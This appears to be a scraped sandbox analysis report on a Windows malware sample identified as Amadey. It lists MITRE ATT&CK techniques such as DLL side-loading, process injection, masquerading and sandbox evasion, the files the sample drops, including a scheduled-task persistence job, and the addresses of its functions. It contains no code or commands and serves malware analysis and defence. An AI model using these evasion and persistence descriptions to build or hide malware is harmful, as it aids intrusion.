Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report f3wrBtIYXx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

C:\Windows\Tasks\explorti.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
f3wrBtIYXx.exe

Function 0071BD60 Relevance: 26.6, APIs: 5, Strings: 10, Instructions: 310
networkfileCOMMON

Function 007165B0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 257
COMMON

Function 00715DF0 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 364
COMMON

Function 00717D00 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 392
COMMON

Function 00746E01 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145
COMMON

Function 007182B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 159
COMMON

Function 00746F71 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
timeCOMMON

Function 00726AE0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40
sleepCOMMON

Function 00746C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 05100DF4 Relevance: .1, Instructions: 78
COMMON